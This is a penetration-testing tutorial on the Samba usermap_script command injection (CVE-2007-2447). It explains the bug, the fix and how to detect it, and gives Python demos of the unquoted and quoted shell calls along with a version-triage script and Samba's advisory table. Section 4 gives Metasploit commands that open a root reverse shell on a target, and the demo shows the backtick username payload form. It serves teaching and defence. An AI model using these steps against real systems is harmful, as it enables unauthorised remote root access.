
4.9. Exploitation: SMB RCE (remote command execution via Samba usermap_script)


Contents

1. Samba service overview

2. Vulnerability information

3. Fingerprinting Samba

4. Exploitation with Metasploit

5. Samba vulnerabilities over the years


1. Samba service overview

1.1 Samba is free software that implements the SMB protocol on Linux and UNIX systems. It consists of server daemons and client programs.

1.2 SMB (Server Message Block) is a protocol for sharing files and printers on a local network: it lets different machines on the LAN access each other's files, printers and other resources. SMB is a client/server (C/S) protocol; a client uses it to reach shared file systems, printers and other resources on the server.

1.3 Ports Samba listens on
TCP 139 and 445: served by smbd, which provides shared access to the server's files and printers. Port 139 is SMB carried over the NetBIOS session service; port 445 is SMB directly over TCP.
UDP 137 and 138: served by nmbd, which provides NetBIOS name resolution and browsing.

Further reading: Samba 服務詳解 (公博義's CSDN blog)

2. Vulnerability information

2.1 The Samba usermap_script vulnerability

"username map script" is an smb.conf option, not part of the SMB protocol: it names an external script that smbd runs to map a client-supplied username onto a local account. The command-injection bug in how smbd invoked that script is CVE-2007-2447, disclosed in May 2007. The Samba project's advisory (see the 14 May 2007 rows in section 5) lists Samba 3.0.0 through 3.0.25rc3 as affected; the Metasploit module used in section 4 targets 3.0.20 through 3.0.25rc3. The option is off by default, so a server in that version range is only exploitable this way if an administrator has enabled it.

2.2 Description

smbd failed to validate user-supplied data, allowing a remote attacker to execute arbitrary commands on the server. The code that updates a user's password in the SAM database (reached through the MS-RPC SamrChangePassword call) handed the client-supplied username to /bin/sh without filtering when it invoked the external script configured in smb.conf. A username carrying shell metacharacters is therefore executed as a command. The CNVD/NVD text says the commands run "with the privileges of the nobody user"; note, however, that the username map script is run before the client is authenticated, inside smbd's own process, so in practice the commands run with smbd's privileges, which is why the session obtained in section 4 is root.

References:

Aliyun vulnerability database (AVD)

https://www.cnvd.org.cn/flaw/show/CNVD-2007-3296

NVD - CVE-2007-2447

2.3 Fix

Upgrade to Samba 3.0.25 or later (the project also shipped a patch against 3.0.24). If the upgrade cannot happen immediately, remove the "username map script" line from smb.conf: the vulnerable code path is only reached when that option is set. Because testparm -s prints only parameters that differ from their defaults, the following shows whether the option is active on a host:

testparm -s 2>/dev/null | grep -i "username map script"
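To make the mechanism in 2.2 and the reason the fix in 2.3 works concrete, here is an added example in Python; it is not code from the original post or from the Samba project. It re-creates only the string handling: smbd built a shell command line from the configured "username map script" plus the client-supplied username and passed it to /bin/sh -c. MAP_SCRIPT is a constructed stand-in for the administrator's script (a real one would print the mapped account name), and the backtick-wrapped username is the shape the Metasploit module's payload takes. The hardened variant quotes the username before the command line is built; Samba's own patch instead backslash-escapes every character outside an allowlist (the "INCLUDE list" whose missing "c" is mentioned in the 14 May 2007 row of section 5), with the same effect.

```python
"""Minimal re-creation of the CVE-2007-2447 injection pattern (added example)."""
import shlex
import subprocess

# Constructed stand-in for the script named by smb.conf "username map script".
# It just echoes its argument; the only thing that matters is how it is invoked.
MAP_SCRIPT = "printf 'mapped:%s\\n'"


def run_sh(cmdline: str) -> str:
    """Hand a command line to /bin/sh -c, exactly as the vulnerable smbd did."""
    proc = subprocess.run(["/bin/sh", "-c", cmdline],
                          capture_output=True, text=True, check=False)
    return proc.stdout


def vulnerable_map(username: str) -> str:
    """Pre-fix behaviour: the username is spliced into the command line unquoted,
    so backticks, ';', '|', '$(...)' and friends are interpreted by the shell."""
    return run_sh(f"{MAP_SCRIPT} {username}")


def hardened_map(username: str) -> str:
    """Post-fix behaviour: the username is quoted so the shell sees one literal
    word. shlex.quote single-quotes anything containing shell metacharacters."""
    return run_sh(f"{MAP_SCRIPT} {shlex.quote(username)}")


def contains_shell_metachars(username: str) -> bool:
    """Input-side check a hardened caller can apply in addition to quoting:
    these characters never appear in a legitimate account name."""
    return any(c in username for c in "`$;|&<>()\n")


if __name__ == "__main__":
    # Backtick form, as used by the Metasploit module's username payload
    # ("/=`nohup ...`"); the embedded command here is a harmless echo.
    injected = "/=`echo INJECTED`"
    print(repr(vulnerable_map(injected)))   # the echo runs: 'mapped:/=INJECTED\n'
    print(repr(hardened_map(injected)))     # stays literal: 'mapped:/=`echo INJECTED`\n'
    print(contains_shell_metachars(injected), contains_shell_metachars("alice"))
```

Run it on a Linux or BSD box with /bin/sh present. The vulnerable path shows the substituted value, proving the embedded command executed; the hardened path prints the backticks verbatim. Quoting is the fix that matters; the metacharacter check is defence in depth, because a map script that receives a rejected name never runs at all.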

3. Fingerprinting Samba

Probe with nmap:

nmap -sV -p 139,445 ip

-sV reads the SMB banner and typically prints a line such as "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)". When it can only report a range like that, Metasploit's auxiliary/scanner/smb/smb_version module or nmap's smb-os-discovery script usually returns the exact release string (for example 3.0.20-Debian). Whether "username map script" is enabled cannot be observed remotely, so a version inside the affected range marks a candidate, not a confirmed hit; the confirmation is the exploit attempt in section 4 or a look at smb.conf.
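The following is an added example in Python, not part of the original post, for turning the banner step above into a repeatable triage: it parses the service lines nmap -sV prints for ports 139/445, extracts the Samba version where the banner carries one, and checks it against both affected ranges quoted in section 2.1 (3.0.0 - 3.0.25rc3 from the Samba advisory, 3.0.20 - 3.0.25rc3 for the Metasploit module). The nmap output embedded below is constructed for the example; the pre-release ordering (pre < rc < final < letter suffix) is an assumption that matches how the Samba release list in section 5 numbers its versions.

```python
"""Version triage for CVE-2007-2447 from nmap -sV style output (added example)."""
import re
from typing import Dict, Optional, Tuple

# Constructed sample in the style of `nmap -sV -p 139,445 <ip>`: one port where
# nmap could only guess a range, one where the exact release string came back.
SAMPLE_NMAP = """\
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

VERSION_RE = re.compile(r"Samba(?: smbd)?\s+(\d+)\.(\d+)\.(\d+)(rc\d+|pre\d+|[a-z])?")
PORT_LINE_RE = re.compile(r"(\d+)/tcp\s+open\s+\S+\s+(.*)")

Version = Tuple[int, int, int, int, int]


def parse_version(banner: str) -> Optional[Version]:
    """Return a sortable (major, minor, patch, stage, n) tuple, or None when the
    banner has no exact version (nmap's "3.X - 4.X" guess, for example)."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    tag = m.group(4) or ""
    # Assumed ordering: 3.0.25pre2 < 3.0.25rc3 < 3.0.25 < 3.0.25c.
    if tag.startswith("pre"):
        stage, n = 0, int(tag[3:])
    elif tag.startswith("rc"):
        stage, n = 1, int(tag[2:])
    elif tag:
        stage, n = 3, ord(tag) - ord("a") + 1
    else:
        stage, n = 2, 0
    return (major, minor, patch, stage, n)


ADVISORY_RANGE = (parse_version("Samba 3.0.0"), parse_version("Samba 3.0.25rc3"))
MODULE_RANGE = (parse_version("Samba 3.0.20"), parse_version("Samba 3.0.25rc3"))


def triage(banner: str) -> str:
    """Classify one service banner against the CVE-2007-2447 ranges."""
    v = parse_version(banner)
    if v is None:
        return "unknown: no exact version in banner, run smb_version or smb-os-discovery"
    if MODULE_RANGE[0] <= v <= MODULE_RANGE[1]:
        return "candidate: inside Metasploit module range 3.0.20-3.0.25rc3"
    if ADVISORY_RANGE[0] <= v <= ADVISORY_RANGE[1]:
        return "candidate: inside advisory range 3.0.0-3.0.25rc3, outside module range"
    return "not affected by CVE-2007-2447 (check section 5 for later issues)"


def triage_nmap_output(text: str) -> Dict[int, str]:
    """Map each open TCP port in nmap output to its triage verdict."""
    results: Dict[int, str] = {}
    for line in text.splitlines():
        m = PORT_LINE_RE.match(line)
        if m:
            results[int(m.group(1))] = triage(m.group(2))
    return results


if __name__ == "__main__":
    for port, verdict in sorted(triage_nmap_output(SAMPLE_NMAP).items()):
        print(f"{port}/tcp: {verdict}")
```

Feed it the saved output of a real scan (nmap -sV -p 139,445 ip -oN scan.txt) instead of SAMPLE_NMAP. A "candidate" verdict still only narrows the target list, for the reason given above: the banner cannot tell you whether username map script is set.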

4. Exploitation with Metasploit

Use the Samba usermap RCE module bundled with Metasploit:
exploit/multi/samba/usermap_script

use exploit/multi/samba/usermap_script

show options

set rhosts 192.168.106.132

The module needs no credentials, because the username map script is run before authentication. RPORT defaults to 139.

Choose a payload and launch the attack:

show payloads

set payload cmd/unix/reverse

show options

exploit

cmd/unix/reverse is a reverse shell, so after setting the payload check that LHOST (shown by the second show options) is an address the target can reach; Metasploit fills it with a local interface address by default, which is wrong when the target sits on another network.

The session that comes back runs as root on the target, for the reason given in section 2.2 (the script is executed inside smbd's own process). CTRL+C ends the session.

5. Samba vulnerabilities over the years

References:

Samba - Security Updates and Information

Aliyun vulnerability database (AVD)

Samba security releases (copied from the Samba project's security page; the repeated "Announcement" link text and the duplicated "please see the advisories" notes of the original table are dropped, and "Patches" lists the Samba versions each patch was issued against)

Date | Patches | Issue | Affected versions | CVE IDs
25 October 2022 | 4.17.2, 4.16.6, 4.15.11 | See the advisories | See the advisories | CVE-2022-3437, CVE-2022-3592
27 July 2022 | 4.16.4, 4.15.9, 4.14.14 | See the advisories | See the advisories | CVE-2022-2031, CVE-2022-32742, CVE-2022-32744, CVE-2022-32745, CVE-2022-32746
31 January 2022 | 4.15.5, 4.14.12, 4.13.17 | See the advisories | See the advisories | CVE-2021-44141, CVE-2021-44142, CVE-2022-0336
10 January 2022 | 4.13.16 | Symlink race error can allow directory creation outside of the exported share | All versions of the Samba file server prior to 4.13.16 | CVE-2021-43566
9 November 2021 | 4.15.1, 4.14.9, 4.13.13 | See the advisories | See the advisories | CVE-2016-2124, CVE-2020-25717, CVE-2020-25718, CVE-2020-25719, CVE-2020-25721, CVE-2020-25722, CVE-2021-3738, CVE-2021-23192
29 Apr 2021 | 4.14.3, 4.13.7, 4.12.14 | Negative idmap cache entries can cause incorrect group entries in the Samba file server process token | All versions since 3.6.0 | CVE-2021-20254
24 Mar 2021 | 4.14.0, 4.13.5, 4.12.12 | See the advisories | See the advisories | CVE-2020-27840, CVE-2021-20277
29 Oct 2020 | 4.13.0, 4.12.8, 4.11.14 | See the advisories | See the advisories | CVE-2020-14318, CVE-2020-14323, CVE-2020-14383
18 Sep 2020 | 4.12.6, 4.11.12, 4.10.17 | See the advisory | See the advisory | CVE-2020-1472
02 Jul 2020 | 4.12.3, 4.11.10, 4.10.16 | See the advisories | See the advisories | CVE-2020-10730, CVE-2020-10745, CVE-2020-10760, CVE-2020-14303
28 Apr 2020 | 4.12.1, 4.11.7, 4.10.14 | See the advisories | See the advisories | CVE-2020-10700, CVE-2020-10704
21 Jan 2020 | 4.11.4, 4.10.11, 4.9.17 | See the advisories | See the advisories | CVE-2019-14902, CVE-2019-14907, CVE-2019-19344
10 Dec 2019 | 4.11.2, 4.10.10, 4.9.16 | See the advisories | All versions since Samba 4.0 | CVE-2019-14861, CVE-2019-14870
29 Oct 2019 | 4.11.1, 4.10.9, 4.9.14 | See the advisories | See the advisories | CVE-2019-10218, CVE-2019-14833, CVE-2019-14847
03 Sep 2019 | 4.10.7, 4.9.12 | Combination of parameters and permissions can allow user to escape from the share path definition | All versions between Samba 4.9.0 and 4.9.12/4.10.7 (incl.) | CVE-2019-10197
19 Jun 2019 | 4.10.4 (both CVEs), 4.9.8 (CVE-2019-12435 only) | See the advisories | See the advisories | CVE-2019-12435, CVE-2019-12436
14 May 2019 | 4.10.2, 4.9.7, 4.8.11 | See the advisory | All versions of Samba prior to 4.10.3, 4.9.8, 4.8.12 | CVE-2018-16860
08 Apr 2019 | 4.10.1 (both CVEs), 4.9.5 (both CVEs), 4.8.10 (CVE-2019-3880 only) | See the advisories | See the advisories | CVE-2019-3870, CVE-2019-3880
27 Nov 2018 | 4.9.2 (all CVEs), 4.8.6 and 4.7.11 (all CVEs except CVE-2018-16852 and CVE-2018-16857) | Numerous CVEs, see the advisories | See the advisories | CVE-2018-14629, CVE-2018-16841, CVE-2018-16851, CVE-2018-16852, CVE-2018-16853, CVE-2018-16857
14 Aug 2018 | 4.8.3 (all CVEs), 4.7.8 (all CVEs except CVE-2018-1140), 4.6.15 (CVE-2018-10858 and CVE-2018-10919) | Numerous CVEs, see the advisories | See the advisories | CVE-2018-10858, CVE-2018-10918, CVE-2018-10919, CVE-2018-1139, CVE-2018-1140
13 Mar 2018 | 4.7.5, 4.6.13, 4.5.15, 4.4.16 (only CVE-2018-1057), 4.3.13 (only CVE-2018-1057) | Numerous CVEs, see the advisories | See the advisories | CVE-2018-1050, CVE-2018-1057
21 Nov 2017 | 4.7.2, 4.6.10, 4.5.14 | Numerous CVEs, see the advisories | See the advisories | CVE-2017-14746, CVE-2017-15275
20 Sep 2017 | 4.6.7, 4.5.13, 4.4.15 | Numerous CVEs, see the advisories | See the advisories | CVE-2017-12150, CVE-2017-12151, CVE-2017-12163
12 July 2017 | 4.x.y | Orpheus' Lyre mutual authentication validation bypass | All versions between Samba 4.0.0 and 4.6.6/4.5.12/4.4.15 | CVE-2017-11103
24 May 2017 | 4.6.3, 4.5.9, 4.4.13 | Remote code execution from a writable share | All versions between Samba 3.5.0 and 4.6.4/4.5.10/4.4.14 | CVE-2017-7494
23 Mar 2017 | 4.6.0, 4.5.6, 4.4.11 | Symlink race allows access outside share definition | All versions of Samba prior to 4.6.1, 4.5.7, 4.4.12 | CVE-2017-2619
19 Dec 2016 | 4.5.2, 4.4.7, 4.3.12 | Numerous CVEs, see the advisories | See the advisories | CVE-2016-2123, CVE-2016-2125, CVE-2016-2126
07 Jul 2016 | 4.4.4, 4.3.10, 4.2.13 | Client side SMB2/3 required signing can be downgraded | 4.0.0 - 4.4.4 | CVE-2016-2119
12 Apr 2016 | 4.4.0, 4.3.6, 4.2.9, 4.0.26 (fileserver only! no client! no domain controller!), 3.6.25 (only related CVEs) | Numerous CVEs, see the advisories | See the advisories | CVE-2015-5370, CVE-2016-2110, CVE-2016-2111, CVE-2016-2112, CVE-2016-2113, CVE-2016-2114, CVE-2016-2115, CVE-2016-2118
08 Mar 2016 | 4.3.5, 4.2.8, 4.1.22 | Incorrect ACL get/set allowed on symlink path; out-of-bounds read in internal DNS server | See the advisories | CVE-2015-7560, CVE-2016-0771
16 Dec 2015 | 4.3.2, 4.2.6, 4.1.21, 3.6.25 | Numerous CVEs, see the advisories | 3.0.0 to 4.3.2 | CVE-2015-3223, CVE-2015-5252, CVE-2015-5296, CVE-2015-5299, CVE-2015-5330, CVE-2015-7540, CVE-2015-8467
23 Feb 2015 | 4.1.16, 4.0.24, 3.6.24, 3.5.22 | Unexpected code execution in smbd | 3.5.0 - 4.2.0rc4 | CVE-2015-0240
15 Jan 2015 | 4.1.15, 4.0.23 | Elevation of privilege to Active Directory Domain Controller | 4.0.0 - 4.1.15 | CVE-2014-8143
01 Aug 2014 | 4.1.10, 4.0.20 | Remote code execution in nmbd | 4.0.0 - 4.1.10 | CVE-2014-3560
23 Jun 2014 | 4.1.8, 4.0.18, 3.6.23 | Denial of service - CPU loop; denial of service - server crash/memory corruption | See the advisories | CVE-2014-0244, CVE-2014-3493
03 June 2014 | 4.0.17, 4.1.7, 3.6.23 (CVE-2014-0178 only) | Uninitialized memory exposure; potential DoS in Samba internal DNS server | See the advisories | CVE-2014-0178, CVE-2014-0239
11 Mar 2014 | 4.1.5, 4.0.15, 3.6.22 | Password lockout not enforced for SAMR password changes; smbcacls can remove a file or directory ACL by mistake | See the advisories | CVE-2013-4496, CVE-2013-6442
09 Dec 2013 | 4.1.2, 4.0.12, 3.6.21, 3.5.22, 3.4.17 | DCE-RPC fragment length field is incorrectly checked; pam_winbind login without require_membership_of restrictions | See the advisories | CVE-2013-4408, CVE-2012-6150
11 Nov 2013 | 4.1.0, 4.0.10, 3.6.19 | ACLs are not checked on opening an alternate data stream on a file or directory; private key in key.pem world readable | 3.2.0 - 4.1.0; 4.0.0 - 4.0.10, 4.1.0 | CVE-2013-4475, CVE-2013-4476
05 Aug 2013 | 4.0.7, 3.6.16, 3.5.21 | Denial of service - CPU loop and memory allocation | 3.0.x - 4.0.7 | CVE-2013-4124
02 Apr 2013 | 3.6.5 | A writable configured share might get read only | 3.6.0 - 3.6.5 (inclusive) | CVE-2013-0454
19 Mar 2013 | 4.0.3 | World-writeable files may be created in additional shares on a Samba 4.0 AD DC | 4.0.0rc6 - 4.0.3 | CVE-2013-1863
30 Jan 2013 | 4.0.1, 3.6.11, 3.5.20 | Clickjacking issue and potential XSRF in SWAT | 3.0.x - 4.0.1 | CVE-2013-0213, CVE-2013-0214
15 Jan 2013 | 4.0.0 | Samba 4.0 as an AD DC may provide authenticated users with write access to LDAP directory objects | 4.0.0 | CVE-2013-0172
30 Apr 2012 | 3.4.16, 3.5.14, 3.6.4 | Incorrect permission checks when granting/removing privileges can compromise file server security | 3.4.x - 3.6.4 | CVE-2012-2111
10 Apr 2012 | 3.0.37, 3.2.15, 3.3.16, 3.4.15, 3.5.13, 3.6.3 | "root" credential remote code execution | All current releases | CVE-2012-1182
23 Feb 2012 | 3.0, 3.2, 3.3 | Remote code execution vulnerability in smbd | pre-3.4 | CVE-2012-0870
29 Jan 2012 | 3.6.2 | Memory leak/denial of service | 3.6.0 - 3.6.2 | CVE-2012-0817
26 Jul 2011 | 3.3.15, 3.4.13, 3.5.9 | Cross-site request forgery in SWAT | All current releases | CVE-2011-2522
26 Jul 2011 | 3.3.15, 3.4.13, 3.5.9 | Cross-site scripting vulnerability in SWAT | All current releases | CVE-2011-2694
18 Feb 2011 | 3.3.14, 3.4.11, 3.5.6 | Denial of service - memory corruption | All current releases | CVE-2011-0719
14 Sep 2010 | 3.3.13, 3.4.8, 3.5.4 | Buffer overrun vulnerability | All current releases | CVE-2010-3069
16 Jun 2010 | 3.3.12 and 3.2.15, 3.0.37 | Memory corruption vulnerability | 3.0.x, 3.2.x, 3.3.0 - 3.3.12 | CVE-2010-2063
08 Mar 2010 | 3.5.0, 3.4.6, 3.3.11 | Permission ignored | 3.3.11, 3.4.6, 3.5.0 | CVE-2010-0728
02 Feb 2010 | not available | Change parameter "wide links" to default to "no" | pre-3.4.6 | CVE-2010-0926
01 Oct 2009 | patches 1 and 2 for each of 3.4.1, 3.3.7, 3.2.14, 3.0.36 | Information disclosure by setuid mount.cifs | All releases | CVE-2009-2948
01 Oct 2009 | 3.4.1, 3.3.7, 3.2.14, 3.0.36 | Remote DoS against smbd on authenticated connections | All releases | CVE-2009-2906
01 Oct 2009 | 3.4.1, 3.3.7, 3.2.14, 3.0.36 | Misconfigured /etc/passwd file may share folders unexpectedly | > 3.0.11 | CVE-2009-2813
23 Jun 2009 | 3.3.5, 3.2.12, 3.0.34 | Uninitialized read of a data value | 3.0.31 - 3.3.5 | CVE-2009-1888
23 Jun 2009 | 3.2.12 | Format string vulnerability in smbclient | 3.2.0 - 3.2.12 | CVE-2009-1886
05 Jan 2009 | 3.2.6 | Potential access to "/" in setups with registry shares enabled | 3.2.0 - 3.2.6 | CVE-2009-0022
27 Nov 2008 | 3.0.32, 3.2.4 | Potential leak of arbitrary memory contents | 3.0.29 - 3.2.4 | CVE-2008-4314
27 Aug 2008 | patches 1 and 2 for 3.2.2 | Wrong permissions of group_mapping.ldb | 3.2.0 - 3.2.2 | CVE-2008-3789
29 May 2008 | 3.0.29 | Boundary failure when parsing SMB responses | 3.0.0 - 3.0.29 | CVE-2008-1105
10 Dec 2007 | 3.0.27a | Remote code execution in Samba's nmbd (send_mailslot()) | 3.0.0 - 3.0.27a | CVE-2007-6015
15 Nov 2007 | 3.0.26a | Remote code execution in Samba's nmbd | 3.0.0 - 3.0.26a | CVE-2007-5398
15 Nov 2007 | 3.0.26a | GETDC mailslot processing buffer overrun in nmbd | 3.0.0 - 3.0.26a | CVE-2007-4572
11 Sep 2007 | 3.0.25 | Incorrect primary group assignment for users using the rfc2307 or sfu nss info plugin | 3.0.25 - 3.0.25c | CVE-2007-4138
14 May 2007 | 3.0.24 | Remote command injection vulnerability (updated June 5 to include missing "c" character from INCLUDE list) | 3.0.0 - 3.0.25rc3 | CVE-2007-2447
14 May 2007 | 3.0.24 | Multiple heap overflows allow remote code execution (updated May 25 to fix regression in Samba domain controller logon code) | 3.0.0 - 3.0.25rc3 | CVE-2007-2446
14 May 2007 | 3.0.24 | Local SID/name translation bug can result in user privilege elevation (updated May 25 to fix regression in the "force group" parameter) | 3.0.23d - 3.0.25pre2 | CVE-2007-2444
5 Feb 2007 | 3.0.23d | Potential denial of service bug in smbd | 3.0.6 - 3.0.23d | CVE-2007-0452
5 Feb 2007 | 3.0.23d | Buffer overrun in NSS host lookup Winbind library on Solaris | 3.0.21 - 3.0.23d | CVE-2007-0453
5 Feb 2007 | 3.0.23d | Format string bug in afsacl.so VFS plugin | 3.0.6 - 3.0.23d | CVE-2007-0454
10 July 2006 | 3.0.1 - 3.0.22 | Memory exhaustion DoS against smbd | 3.0.1 - 3.0.22 | CVE-2006-3403
30 March 2006 | 3.0.21[a-c] | Exposure of machine account credentials in winbind log files | 3.0.21 - 3.0.21c | CVE-2006-1059
16 December 2004 | 3.0.9 | Integer overflow in security descriptor parsing | 2.x, 3.0.x <= 3.0.9 | CVE-2004-1154
15 November 2004 | <= 3.0.7 | Buffer overrun in smbd | 3.0.x <= 3.0.7 | CVE-2004-0882
8 November 2004 | <= 3.0.7 | Remote DoS | 3.0.x <= 3.0.7 | CVE-2004-0930
30 September 2004 | 2.2.12 and/or patch for <= 3.0.2a | Potential arbitrary file access | 2.2.x <= 2.2.11 and 3.0.x <= 3.0.2a | CVE-2004-0815
13 Sept 2004 | 3.0.5 patch | Two DoS bugs; one affecting smbd, the other nmbd | 3.0.x <= 3.0.6 | CVE-2004-0807, CVE-2004-0808
22 Jul 2004 | 3.0.5 | Two potential buffer overruns | >= 3.0.2 | CVE-2004-0600, CVE-2004-0686
22 Jul 2004 | 2.2.10 | Buffer overrun in hash mangling method | All 2.2 releases | CVE-2004-0686
9 Feb 2004 | 3.0.2a | Password initialization bug that could grant an attacker unauthorized access to a user account created by the mksmbpasswd.sh shell script | >= 3.0.0 | CVE-2004-0082
7 Apr 2003 | 2.2.8a | Buffer overrun condition in the SMB/CIFS packet fragment re-assembly code | All 2.0 releases and <= 2.2.8 | CVE-2003-0196, CVE-2003-0201
10 Dec 2002 | 2.2.7a | Bug in the length checking for encrypted password change requests from clients | 2.2.2 - 2.2.6 | CVE-2003-0085
23 Jun 2001 | 2.2.0a | Bug in expansion of certain smb.conf variables such as %m that could grant an attacker the capability to overwrite arbitrary files on the server; bug that causes smbd not to honor the hosts allow and deny smb.conf directives | 2.2.0 | (none listed)
23 Jun 2001 | 2.0.10 | Bug in the handling of temporary files that allows local users to destroy data on local devices | >= 2.0.0 | (none listed)
